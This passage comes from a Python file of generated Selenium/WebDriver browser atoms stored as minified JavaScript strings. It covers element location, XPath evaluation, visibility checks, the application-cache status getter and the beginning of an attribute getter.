"&&a.matches(b)&&e.add(b),e=G(a,b,c,d,e)}return e},!0,!0);M(\"preceding-"\
"sibling\",function(a,b){for(var c=new H,d=b;d=d.previousSibling;)a.matc"\
"hes(d)&&c.unshift(d);return c},!0);M(\"self\",function(a,b){var c=new H"\
";a.matches(b)&&c.add(b);return c},!1);var N={};N.w=function(){var a={R:"\
"\"http://www.w3.org/2000/svg\"};return function(b){return a[b]||null}}("\
");N.i=function(a,b,c){var d=x(a);try{var e=d.createNSResolver?d.createN"\
"SResolver(d.documentElement):N.w;return d.evaluate(b,a,e,c,null)}catch("\
"f){throw new D(32,\"Unable to locate an element with the xpath expressi"\
"on \"+b+\" because of the following error:\\n\"+f);}};N.o=function(a,b)"\
"{if(!a||1!=a.nodeType)throw new D(32,'The result of the xpath expressio"\
"n \"'+b+'\" is: '+a+\". It should be an element.\");};\nN.e=function(a,"\
"b){var c=function(){var c=N.i(b,a,9);return c?c.singleNodeValue||null:b"\
".selectSingleNode?(c=x(b),c.setProperty&&c.setProperty(\"SelectionLangu"\
"age\",\"XPath\"),b.selectSingleNode(a)):null}();null===c||N.o(c,a);retu"\
"rn c};\nN.c=function(a,b){var c=function(){var c=N.i(b,a,7);if(c){for(v"\
"ar e=c.snapshotLength,f=[],g=0;g<e;++g)f.push(c.snapshotItem(g));return"\
" f}return b.selectNodes?(c=x(b),c.setProperty&&c.setProperty(\"Selectio"\
"nLanguage\",\"XPath\"),b.selectNodes(a)):[]}();r(c,function(b){N.o(b,a)"\
"});return c};function O(a,b,c,d){this.left=a;this.top=b;this.width=c;th"\
"is.height=d}O.prototype.toString=function(){return\"(\"+this.left+\", "\
"\"+this.top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};O.prototype"\
".contains=function(a){return a instanceof O?this.left<=a.left&&this.lef"\
"t+this.width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a."\
"top+a.height:a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&"\
"a.y<=this.top+this.height};\nO.prototype.ceil=function(){this.left=Math"\
".ceil(this.left);this.top=Math.ceil(this.top);this.width=Math.ceil(this"\
".width);this.height=Math.ceil(this.height);return this};O.prototype.flo"\
"or=function(){this.left=Math.floor(this.left);this.top=Math.floor(this."\
"top);this.width=Math.floor(this.width);this.height=Math.floor(this.heig"\
"ht);return this};\nO.prototype.round=function(){this.left=Math.round(th"\
"is.left);this.top=Math.round(this.top);this.width=Math.round(this.width"\
");this.height=Math.round(this.height);return this};function Oa(a,b){var"\
" c=x(a);return c.defaultView&&c.defaultView.getComputedStyle&&(c=c.defa"\
"ultView.getComputedStyle(a,null))?c[b]||c.getPropertyValue(b)||\"\":\""\
"\"}function P(a){return Oa(a,\"position\")||(a.currentStyle?a.currentSt"\
"yle.position:null)||a.style&&a.style.position}function Pa(a){var b;try{"\
"b=a.getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom"\
":0}}return b}\nfunction Qa(a){var b=x(a),c=P(a),d=\"fixed\"==c||\"absol"\
"ute\"==c;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(c=P(a),d=d&&\"sta"\
"tic\"==c&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clientWi"\
"dth||a.scrollHeight>a.clientHeight||\"fixed\"==c||\"absolute\"==c||\"re"\
"lative\"==c))return a;return null}\nfunction Ra(a){if(1==a.nodeType){va"\
"r b;if(a.getBoundingClientRect)b=Pa(a),b=new u(b.left,b.top);else{b=ra("\
"w(a));var c=x(a),d=P(a),e=new u(0,0),f=(c?x(c):document).documentElemen"\
"t;if(a!=f)if(a.getBoundingClientRect)a=Pa(a),c=ra(w(c)),e.x=a.left+c.x,"\
"e.y=a.top+c.y;else if(c.getBoxObjectFor)a=c.getBoxObjectFor(a),c=c.getB"\
"oxObjectFor(f),e.x=a.screenX-c.screenX,e.y=a.screenY-c.screenY;else{var"\
" g=a;do{e.x+=g.offsetLeft;e.y+=g.offsetTop;g!=a&&(e.x+=g.clientLeft||0,"\
"e.y+=g.clientTop||0);if(\"fixed\"==P(g)){e.x+=\nc.body.scrollLeft;e.y+="\
"c.body.scrollTop;break}g=g.offsetParent}while(g&&g!=a);\"absolute\"==d&"\
"&(e.y-=c.body.offsetTop);for(g=a;(g=Qa(g))&&g!=c.body&&g!=f;)e.x-=g.scr"\
"ollLeft,e.y-=g.scrollTop}b=new u(e.x-b.x,e.y-b.y)}return b}b=n(a.q);e=a"\
";a.targetTouches?e=a.targetTouches[0]:b&&a.q().targetTouches&&(e=a.q()."\
"targetTouches[0]);return new u(e.clientX,e.clientY)};function Q(a,b){re"\
"turn!!a&&1==a.nodeType&&(!b||a.tagName.toUpperCase()==b)}var Sa=/[;]+(?"\
"=(?:(?:[^\"]*\"){2})*[^\"]*$)(?=(?:(?:[^']*'){2})*[^']*$)(?=(?:[^()]*"\
"\\([^()]*\\))*[^()]*$)/;function Ta(a){var b=[];r(a.split(Sa),function("\
"a){var d=a.indexOf(\":\");0<d&&(a=[a.slice(0,d),a.slice(d+1)],2==a.leng"\
"th&&b.push(a[0].toLowerCase(),\":\",a[1],\";\"))});b=b.join(\"\");retur"\
"n b=\";\"==b.charAt(b.length-1)?b:b+\";\"}\nfunction R(a,b){b=b.toLower"\
"Case();if(\"style\"==b)return Ta(a.style.cssText);var c=a.getAttributeN"\
"ode(b);return c&&c.specified?c.value:null}function S(a){for(a=a.parentN"\
"ode;a&&1!=a.nodeType&&9!=a.nodeType&&11!=a.nodeType;)a=a.parentNode;ret"\
"urn Q(a)?a:null}\nfunction T(a,b){var c=da(b);if(\"float\"==c||\"cssFlo"\
"at\"==c||\"styleFloat\"==c)c=\"cssFloat\";c=Oa(a,c)||Ua(a,c);if(null==="\
"c)c=null;else if(t(ta,b)&&(wa.test(\"#\"==c.charAt(0)?c:\"#\"+c)||Aa(c)"\
".length||sa&&sa[c.toLowerCase()]||ya(c).length)){var d=ya(c);if(!d.leng"\
"th){a:if(d=Aa(c),!d.length){d=(d=sa[c.toLowerCase()])?d:\"#\"==c.charAt"\
"(0)?c:\"#\"+c;if(wa.test(d)&&(d=va(d),d=va(d),d=[parseInt(d.substr(1,2)"\
",16),parseInt(d.substr(3,2),16),parseInt(d.substr(5,2),16)],d.length))b"\
"reak a;d=[]}3==d.length&&d.push(1)}c=4!=\nd.length?c:\"rgba(\"+d.join("\
"\", \")+\")\"}return c}function Ua(a,b){var c=a.currentStyle||a.style,d"\
"=c[b];void 0===d&&n(c.getPropertyValue)&&(d=c.getPropertyValue(b));retu"\
"rn\"inherit\"!=d?void 0!==d?d:null:(c=S(a))?Ua(c,b):null}\nfunction Va("\
"a,b){function c(a){if(\"none\"==T(a,\"display\"))return!1;a=S(a);return"\
"!a||c(a)}function d(a){var b=U(a);return 0<b.height&&0<b.width?!0:Q(a,"\
"\"PATH\")&&(0<b.height||0<b.width)?(a=T(a,\"stroke-width\"),!!a&&0<pars"\
"eInt(a,10)):\"hidden\"!=T(a,\"overflow\")&&ga(a.childNodes,function(a){"\
"return a.nodeType==ka||Q(a)&&d(a)})}function e(a){var b=T(a,\"-o-transf"\
"orm\")||T(a,\"-webkit-transform\")||T(a,\"-ms-transform\")||T(a,\"-moz-"\
"transform\")||T(a,\"transform\");if(b&&\"none\"!==b)return b=Ra(a),a=U("\
"a),0<=b.x+a.width&&\n0<=b.y+a.height?!0:!1;a=S(a);return!a||e(a)}if(!Q("\
"a))throw Error(\"Argument to isShown must be of type Element\");if(Q(a,"\
"\"OPTION\")||Q(a,\"OPTGROUP\")){var f=qa(a,function(a){return Q(a,\"SEL"\
"ECT\")});return!!f&&Va(f,!0)}return(f=Wa(a))?!!f.r&&0<f.rect.width&&0<f"\
".rect.height&&Va(f.r,b):Q(a,\"INPUT\")&&\"hidden\"==a.type.toLowerCase("\
")||Q(a,\"NOSCRIPT\")||\"hidden\"==T(a,\"visibility\")||!c(a)||!b&&0==Xa"\
"(a)||!d(a)||Ya(a)==V?!1:e(a)}var V=\"hidden\";\nfunction Ya(a){function"\
" b(a){var b=a;if(\"visible\"==q)if(a==f)b=g;else if(a==g)return{x:\"vis"\
"ible\",y:\"visible\"};b={x:T(b,\"overflow-x\"),y:T(b,\"overflow-y\")};a"\
"==f&&(b.x=\"hidden\"==b.x?\"hidden\":\"auto\",b.y=\"hidden\"==b.y?\"hid"\
"den\":\"auto\");return b}function c(a){var b=T(a,\"position\");if(\"fix"\
"ed\"==b)return f;for(a=S(a);a&&a!=f&&(0==T(a,\"display\").lastIndexOf("\
"\"inline\",0)||\"absolute\"==b&&\"static\"==T(a,\"position\"));)a=S(a);"\
"return a}var d=U(a),e=x(a),f=e.documentElement,g=e.body,q=T(f,\"overflo"\
"w\");for(a=c(a);a;a=\nc(a)){var m=U(a),e=b(a),B=d.left>=m.left+m.width,"\
"m=d.top>=m.top+m.height;if(B&&\"hidden\"==e.x||m&&\"hidden\"==e.y)retur"\
"n V;if(B&&\"visible\"!=e.x||m&&\"visible\"!=e.y)return Ya(a)==V?V:\"scr"\
"oll\"}return\"none\"}\nfunction U(a){var b=Wa(a);if(b)return b.rect;if("\
"n(a.getBBox))try{var c=a.getBBox();return new O(c.x,c.y,c.width,c.heigh"\
"t)}catch(d){throw d;}else{if(Q(a,\"HTML\"))return a=((x(a)?x(a).parentW"\
"indow||x(a).defaultView:window)||window).document,a=\"CSS1Compat\"==a.c"\
"ompatMode?a.documentElement:a.body,a=new v(a.clientWidth,a.clientHeight"\
"),new O(0,0,a.width,a.height);var b=Ra(a),c=a.offsetWidth,e=a.offsetHei"\
"ght;c||(e||!a.getBoundingClientRect)||(a=a.getBoundingClientRect(),c=a."\
"right-a.left,e=a.bottom-a.top);\nreturn new O(b.x,b.y,c,e)}}function Wa"\
"(a){var b=Q(a,\"MAP\");if(!b&&!Q(a,\"AREA\"))return null;var c=b?a:Q(a."\
"parentNode,\"MAP\")?a.parentNode:null,d=null,e=null;if(c&&c.name&&(d=N."\
"e('/descendant::*[@usemap = \"#'+c.name+'\"]',x(c)))&&(e=U(d),!b&&\"def"\
"ault\"!=a.shape.toLowerCase())){var f=Za(a);a=Math.min(Math.max(f.left,"\
"0),e.width);b=Math.min(Math.max(f.top,0),e.height);c=Math.min(f.width,e"\
".width-a);f=Math.min(f.height,e.height-b);e=new O(a+e.left,b+e.top,c,f)"\
"}return{r:d,rect:e||new O(0,0,0,0)}}\nfunction Za(a){var b=a.shape.toLo"\
"werCase();a=a.coords.split(\",\");if(\"rect\"==b&&4==a.length){var b=a["\
"0],c=a[1];return new O(b,c,a[2]-b,a[3]-c)}if(\"circle\"==b&&3==a.length"\
")return b=a[2],new O(a[0]-b,a[1]-b,2*b,2*b);if(\"poly\"==b&&2<a.length)"\
"{for(var b=a[0],c=a[1],d=b,e=c,f=2;f+1<a.length;f+=2)b=Math.min(b,a[f])"\
",d=Math.max(d,a[f]),c=Math.min(c,a[f+1]),e=Math.max(e,a[f+1]);return ne"\
"w O(b,c,d-b,e-c)}return new O(0,0,0,0)}function $a(a){return a.replace("\
"/^[^\\S\\xa0]+|[^\\S\\xa0]+$/g,\"\")}\nfunction bb(a){var b=[];cb(a,b);"\
"var c=b;a=c.length;for(var b=Array(a),c=l(c)?c.split(\"\"):c,d=0;d<a;d+"\
"+)d in c&&(b[d]=$a.call(void 0,c[d]));return $a(b.join(\"\\n\")).replac"\
"e(/\\xa0/g,\" \")}\nfunction cb(a,b){if(Q(a,\"BR\"))b.push(\"\");else{v"\
"ar c=Q(a,\"TD\"),d=T(a,\"display\"),e=!c&&!t(db,d),f=void 0!=a.previous"\
"ElementSibling?a.previousElementSibling:ma(a.previousSibling),f=f?T(f,"\
"\"display\"):\"\",g=T(a,\"float\")||T(a,\"cssFloat\")||T(a,\"styleFloat"\
"\");!e||(\"run-in\"==f&&\"none\"==g||/^[\\s\\xa0]*$/.test(b[b.length-1]"\
"||\"\"))||b.push(\"\");var q=Va(a),m=null,B=null;q&&(m=T(a,\"white-spac"\
"e\"),B=T(a,\"text-transform\"));r(a.childNodes,function(a){a.nodeType=="\
"ka&&q?eb(a,b,m,B):Q(a)&&cb(a,b)});f=b[b.length-1]||\"\";!c&&\n\"table-c"\
"ell\"!=d||(!f||ca(f))||(b[b.length-1]+=\" \");e&&(\"run-in\"!=d&&!/^["\
"\\s\\xa0]*$/.test(f))&&b.push(\"\")}}var db=\"inline inline-block inlin"\
"e-table none table-cell table-column table-column-group\".split(\" \");"\
"\nfunction eb(a,b,c,d){a=a.nodeValue.replace(/\\u200b/g,\"\");a=a.repla"\
"ce(/(\\r\\n|\\r|\\n)/g,\"\\n\");if(\"normal\"==c||\"nowrap\"==c)a=a.rep"\
"lace(/\\n/g,\" \");a=\"pre\"==c||\"pre-wrap\"==c?a.replace(/[ \\f\\t\\v"\
"\\u2028\\u2029]/g,\"\\u00a0\"):a.replace(/[\\ \\f\\t\\v\\u2028\\u2029]+"\
"/g,\" \");\"capitalize\"==d?a=a.replace(/(^|\\s)(\\S)/g,function(a,b,c)"\
"{return b+c.toUpperCase()}):\"uppercase\"==d?a=a.toUpperCase():\"lowerc"\
"ase\"==d&&(a=a.toLowerCase());c=b.pop()||\"\";ca(c)&&0==a.lastIndexOf("\
"\" \",0)&&(a=a.substr(1));b.push(c+a)}\nfunction Xa(a){var b=1,c=T(a,\""\
"opacity\");c&&(b=Number(c));(a=S(a))&&(b*=Xa(a));return b};var W={},X={"\
"};W.v=function(a,b,c){var d;try{d=C.c(\"a\",b)}catch(e){d=z(w(b),\"A\","\
"null,b)}return ha(d,function(b){b=bb(b);return c&&-1!=b.indexOf(a)||b=="\
"a})};W.s=function(a,b,c){var d;try{d=C.c(\"a\",b)}catch(e){d=z(w(b),\"A"\
"\",null,b)}return s(d,function(b){b=bb(b);return c&&-1!=b.indexOf(a)||b"\
"==a})};W.e=function(a,b){return W.v(a,b,!1)};W.c=function(a,b){return W"\
".s(a,b,!1)};X.e=function(a,b){return W.v(a,b,!0)};X.c=function(a,b){ret"\
"urn W.s(a,b,!0)};var fb={e:function(a,b){return b.getElementsByTagName("\
"a)[0]||null},c:function(a,b){return b.getElementsByTagName(a)}};var gb="\
"{className:A,\"class name\":A,css:C,\"css selector\":C,id:{e:function(a"\
",b){var c=w(b),d=l(a)?c.j.getElementById(a):a;if(!d)return null;if(R(d,"\
"\"id\")==a&&y(b,d))return d;c=z(c,\"*\");return ha(c,function(c){return"\
" R(c,\"id\")==a&&y(b,c)})},c:function(a,b){var c=z(w(b),\"*\",null,b);r"\
"eturn s(c,function(b){return R(b,\"id\")==a})}},linkText:W,\"link text"\
"\":W,name:{e:function(a,b){var c=z(w(b),\"*\",null,b);return ha(c,funct"\
"ion(b){return R(b,\"name\")==a})},c:function(a,b){var c=z(w(b),\"*\",nu"\
"ll,b);return s(c,function(b){return R(b,\n\"name\")==a})}},partialLinkT"\
"ext:X,\"partial link text\":X,tagName:fb,\"tag name\":fb,xpath:N};funct"\
"ion hb(a,b){var c;a:{for(c in a)if(a.hasOwnProperty(c))break a;c=null}i"\
"f(c){var d=gb[c];if(d&&n(d.c))return d.c(a[c],b||ba.document)}throw Err"\
"or(\"Unsupported locator strategy: \"+c);}var Y=[\"_\"],Z=k;Y[0]in Z||!"\
"Z.execScript||Z.execScript(\"var \"+Y[0]);for(var $;Y.length&&($=Y.shif"\
"t());)Y.length||void 0===hb?Z=Z[$]?Z[$]:Z[$]={}:Z[$]=hb;; return this._"\
".apply(null,arguments);}.apply({navigator:typeof window!=undefined?wind"\
"ow.navigator:null,document:typeof window!=undefined?window.document:nul"\
"l}, arguments);}"
# Minified JavaScript source held as a Python string, intended to be injected
# into a browser page and evaluated there (presumably a generated
# Selenium/WebDriver "browser atom" — NOTE(review): confirm against the
# generator that produced this file).  The wrapped function checks for
# `window.applicationCache` support and returns `applicationCache.status`,
# throwing a WebDriver-style error (code 13, "Undefined application cache")
# when the API is unavailable.  This is generated code: do not edit the
# string content by hand.
GET_APPCACHE_STATUS = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.a="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"appcache\"){case \"appc"\
"ache\":return null!=a.applicationCache;case \"browser_connection\":retu"\
"rn null!=a.navigator&&null!=a.navigator.onLine;case \"database\":return"\
" null!=a.openDatabase;case \"location\":return k?!1:null!=a.navigator&&"\
"null!=a.navigator.geolocation;case \"local_storage\":return null!=a.loc"\
"alStorage;case \"session_storage\":return null!=a.sessionStorage&&null!"\
"=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API identi"\
"fier provided as parameter\");}};function n(){var a;if(m())a=c.applicat"\
"ionCache.status;else throw new d(13,\"Undefined application cache\");re"\
"turn a}var p=[\"_\"],q=this;p[0]in q||!q.execScript||q.execScript(\"var"\
" \"+p[0]);for(var r;p.length&&(r=p.shift());)p.length||void 0===n?q=q[r"\
"]?q[r]:q[r]={}:q[r]=n;; return this._.apply(null,arguments);}.apply({na"\
"vigator:typeof window!=undefined?window.navigator:null,document:typeof "\
"window!=undefined?window.document:null}, arguments);}"
GET_ATTRIBUTE = \
"function(){return function(){function e(a){return function(){return a}}"\
"var h=this;function k(a){return\"string\"==typeof a}function l(a){var b"\
"=typeof a;return\"object\"==b&&null!=a||\"function\"==b};var m=Array.pr"\
"ototype;function n(a,b){if(k(a))return k(b)&&1==b.length?a.indexOf(b,0)"\
":-1;for(var c=0;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1}fu"\
"nction p(a,b){for(var c=a.length,d=k(a)?a.split(\"\"):a,f=0;f<c;f++)f i"\
"n d&&b.call(void 0,d[f],f,a)}function aa(a,b){if(a.reduce)return a.redu"\
"ce(b,\"\");var c=\"\";p(a,function(d,f){c=b.call(void 0,c,d,f,a)});retu"\
"rn c}function ba(a,b,c){return 2>=arguments.length?m.slice.call(a,b):m."\
"slice.call(a,b,c)};function q(a,b){this.code=a;this.state=s[a]||t;this."\
"message=b||\"\";var c=this.state.replace(/((?:^|\\s+)[a-z])/g,function("\
"a){return a.toUpperCase().replace(/^[\\s\\xa0]+/g,\"\")}),d=c.length-5;"\
"if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";this.name=c;c=Error(this"\
".message);c.name=this.name;this.stack=c.stack||\"\"}(function(){var a=E"\
"rror;function b(){}b.prototype=a.prototype;q.N=a.prototype;q.prototype="\
"new b})();\nvar t=\"unknown error\",s={15:\"element not selectable\",11"\
":\"element not visible\",31:\"ime engine activation failed\",30:\"ime n"\
"ot available\",24:\"invalid cookie domain\",29:\"invalid element coordi"\
"nates\",12:\"invalid element state\",32:\"invalid selector\",51:\"inval"\
"id selector\",52:\"invalid selector\",17:\"javascript error\",405:\"uns"\
"upported operation\",34:\"move target out of bounds\",27:\"no such aler"\
"t\",7:\"no such element\",8:\"no such frame\",23:\"no such window\",28:"\
"\"script timeout\",33:\"session not created\",10:\"stale element refere"\
"nce\",\n0:\"success\",21:\"timeout\",25:\"unable to set cookie\",26:\"u"\
"nexpected alert open\"};s[13]=t;s[9]=\"unknown command\";q.prototype.to"\
"String=function(){return this.name+\": \"+this.message};var u,w,x,z=h.n"\
"avigator;x=z&&z.platform||\"\";u=-1!=x.indexOf(\"Mac\");w=-1!=x.indexOf"\
"(\"Win\");var A=-1!=x.indexOf(\"Linux\");function B(a,b){if(a.contains&"\
"&1==b.nodeType)return a==b||a.contains(b);if(\"undefined\"!=typeof a.co"\
"mpareDocumentPosition)return a==b||Boolean(a.compareDocumentPosition(b)"\
"&16);for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction ca(a,b){if(a=="\
"b)return 0;if(a.compareDocumentPosition)return a.compareDocumentPositio"\
"n(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"sourceIndex\"in a.p"\
"arentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sourceI"\
"ndex-b.sourceIndex;var f=a.parentNode,g=b.parentNode;return f==g?C(a,b)"\
":!c&&B(f,b)?-1*D(a,b):!d&&B(g,a)?D(b,a):(c?a.sourceIndex:f.sourceIndex)"\
"-(d?b.sourceIndex:g.sourceIndex)}d=9==a.nodeType?a:a.ownerDocument||a.d"\
"ocument;c=d.createRange();c.selectNode(a);c.collapse(!0);\nd=d.createRa"\
"nge();d.selectNode(b);d.collapse(!0);return c.compareBoundaryPoints(h.R"\
"ange.START_TO_END,d)}function D(a,b){var c=a.parentNode;if(c==b)return-"\
"1;for(var d=b;d.parentNode!=c;)d=d.parentNode;return C(d,a)}function C("\
"a,b){for(var c=b;c=c.previousSibling;)if(c==a)return-1;return 1};functi"\
"on E(a){var b=null,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||nul"\
"l==b?a.innerText:b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b"\
")if(9==c||1==c){a=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],"\
"b=\"\";a;){do 1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstC"\
"hild);for(;c&&!(a=d[--c].nextSibling););}}else b=a.nodeValue;return\"\""\
"+b}\nfunction F(a,b,c){if(null===b)return!0;try{if(!a.getAttribute)retu"\
"rn!1}catch(d){return!1}return null==c?!!a.getAttribute(b):a.getAttribut"\
"e(b,2)==c}function G(a,b,c,d,f){return da.call(null,a,b,k(c)?c:null,k(d"\
")?d:null,f||new H)}\nfunction da(a,b,c,d,f){b.getElementsByName&&d&&\"n"\
"ame\"==c?(b=b.getElementsByName(d),p(b,function(b){a.matches(b)&&f.add("\
"b)})):b.getElementsByClassName&&d&&\"class\"==c?(b=b.getElementsByClass"\
"Name(d),p(b,function(b){b.className==d&&a.matches(b)&&f.add(b)})):b.get"\
"ElementsByTagName&&(b=b.getElementsByTagName(a.getName()),p(b,function("\
"a){F(a,c,d)&&f.add(a)}));return f}function ea(a,b,c,d,f){for(b=b.firstC"\
"hild;b;b=b.nextSibling)F(b,c,d)&&a.matches(b)&&f.add(b);return f};funct"\
"ion H(){this.g=this.f=null;this.l=0}function I(a){this.p=a;this.next=th"\
"is.n=null}H.prototype.unshift=function(a){a=new I(a);a.next=this.f;this"\
".g?this.f.n=a:this.f=this.g=a;this.f=a;this.l++};H.prototype.add=functi"\
"on(a){a=new I(a);a.n=this.g;this.f?this.g.next=a:this.f=this.g=a;this.g"\
"=a;this.l++};function J(a){return(a=a.f)?a.p:null}function K(a){return "\
"new L(a,!1)}function L(a,b){this.J=a;this.o=(this.q=b)?a.g:a.f;this.u=n"\
"ull}\nL.prototype.next=function(){var a=this.o;if(null==a)return null;v"\
"ar b=this.u=a;this.o=this.q?a.n:a.next;return b.p};function N(a,b,c,d,f"\
"){b=b.evaluate(d);c=c.evaluate(d);var g;if(b instanceof H&&c instanceof"\
" H){f=K(b);for(d=f.next();d;d=f.next())for(b=K(c),g=b.next();g;g=b.next"\
"())if(a(E(d),E(g)))return!0;return!1}if(b instanceof H||c instanceof H)"\
"{b instanceof H?f=b:(f=c,c=b);f=K(f);b=typeof c;for(d=f.next();d;d=f.ne"\
"xt()){switch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d)"\
";break;case \"string\":d=E(d);break;default:throw Error(\"Illegal primi"\
"tive type for comparison.\");}if(a(d,c))return!0}return!1}return f?\n\""\
"boolean\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeo"\
"f b||\"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function O(a,b,c,d){"\
"this.v=a;this.L=b;this.s=c;this.t=d}O.prototype.toString=function(){ret"\
"urn this.v};var fa={};function P(a,b,c,d){if(a in fa)throw Error(\"Bina"\
"ry operator already created: \"+a);a=new O(a,b,c,d);fa[a.toString()]=a}"\
"P(\"div\",6,1,function(a,b,c){return a.d(c)/b.d(c)});P(\"mod\",6,1,func"\
"tion(a,b,c){return a.d(c)%b.d(c)});P(\"*\",6,1,function(a,b,c){return a"\
".d(c)*b.d(c)});\nP(\"+\",5,1,function(a,b,c){return a.d(c)+b.d(c)});P("\
"\"-\",5,1,function(a,b,c){return a.d(c)-b.d(c)});P(\"<\",4,2,function(a"\
",b,c){return N(function(a,b){return a<b},a,b,c)});P(\">\",4,2,function("\
"a,b,c){return N(function(a,b){return a>b},a,b,c)});P(\"<=\",4,2,functio"\
"n(a,b,c){return N(function(a,b){return a<=b},a,b,c)});P(\">=\",4,2,func"\
"tion(a,b,c){return N(function(a,b){return a>=b},a,b,c)});P(\"=\",3,2,fu"\
"nction(a,b,c){return N(function(a,b){return a==b},a,b,c,!0)});\nP(\"!="\
"\",3,2,function(a,b,c){return N(function(a,b){return a!=b},a,b,c,!0)});"\
"P(\"and\",2,2,function(a,b,c){return a.j(c)&&b.j(c)});P(\"or\",1,2,func"\
"tion(a,b,c){return a.j(c)||b.j(c)});function ga(a,b,c,d,f,g,r,v,y){this"\
".m=a;this.s=b;this.I=c;this.H=d;this.G=f;this.t=g;this.F=r;this.D=void "\
"0!==v?v:r;this.K=!!y}ga.prototype.toString=function(){return this.m};va"\
"r ha={};function Q(a,b,c,d,f,g,r,v){if(a in ha)throw Error(\"Function a"\
"lready created: \"+a+\".\");ha[a]=new ga(a,b,c,d,!1,f,g,r,v)}Q(\"boolea"\
"n\",2,!1,!1,function(a,b){return b.j(a)},1);Q(\"ceiling\",1,!1,!1,funct"\
"ion(a,b){return Math.ceil(b.d(a))},1);\nQ(\"concat\",3,!1,!1,function(a"\
",b){var c=ba(arguments,1);return aa(c,function(b,c){return b+c.c(a)})},"\
"2,null);Q(\"contains\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return"\
"-1!=b.indexOf(a)},2);Q(\"count\",1,!1,!1,function(a,b){return b.evaluat"\
"e(a).l},1,1,!0);Q(\"false\",2,!1,!1,e(!1),0);Q(\"floor\",1,!1,!1,functi"\
"on(a,b){return Math.floor(b.d(a))},1);\nQ(\"id\",4,!1,!1,function(a,b){"\
"var c=a.h(),d=9==c.nodeType?c:c.ownerDocument,c=b.c(a).split(/\\s+/),f="\
"[];p(c,function(a){a=d.getElementById(a);!a||0<=n(f,a)||f.push(a)});f.s"\
"ort(ca);var g=new H;p(f,function(a){g.add(a)});return g},1);Q(\"lang\","\
"2,!1,!1,e(!1),1);Q(\"last\",1,!0,!1,function(a){if(1!=arguments.length)"\
"throw Error(\"Function last expects ()\");return a.B()},0);Q(\"local-na"\
"me\",3,!1,!0,function(a,b){var c=b?J(b.evaluate(a)):a.h();return c?c.no"\
"deName.toLowerCase():\"\"},0,1,!0);\nQ(\"name\",3,!1,!0,function(a,b){v"\
"ar c=b?J(b.evaluate(a)):a.h();return c?c.nodeName.toLowerCase():\"\"},0"\
",1,!0);Q(\"namespace-uri\",3,!0,!1,e(\"\"),0,1,!0);Q(\"normalize-space"\
"\",3,!1,!0,function(a,b){return(b?b.c(a):E(a.h())).replace(/[\\s\\xa0]+"\
"/g,\" \").replace(/^\\s+|\\s+$/g,\"\")},0,1);Q(\"not\",2,!1,!1,function"\
"(a,b){return!b.j(a)},1);Q(\"number\",1,!1,!0,function(a,b){return b?b.d"\
"(a):+E(a.h())},0,1);Q(\"position\",1,!0,!1,function(a){return a.C()},0)"\
";Q(\"round\",1,!1,!1,function(a,b){return Math.round(b.d(a))},1);\nQ(\""\
"starts-with\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return 0==b.las"\
"tIndexOf(a,0)},2);Q(\"string\",3,!1,!0,function(a,b){return b?b.c(a):E("\
"a.h())},0,1);Q(\"string-length\",1,!1,!0,function(a,b){return(b?b.c(a):"\
"E(a.h())).length},0,1);\nQ(\"substring\",3,!1,!1,function(a,b,c,d){c=c."\
"d(a);if(isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.d(a):Infin"\
"ity;if(isNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var f=Math."\
"max(c,0);a=b.c(a);if(Infinity==d)return a.substring(f);b=Math.round(d);"\
"return a.substring(f,c+b)},2,3);Q(\"substring-after\",3,!1,!1,function("\
"a,b,c){b=b.c(a);a=c.c(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+"\
"a.length)},2);\nQ(\"substring-before\",3,!1,!1,function(a,b,c){b=b.c(a)"\
";a=c.c(a);a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);Q(\"sum"\
"\",1,!1,!1,function(a,b){for(var c=K(b.evaluate(a)),d=0,f=c.next();f;f="\
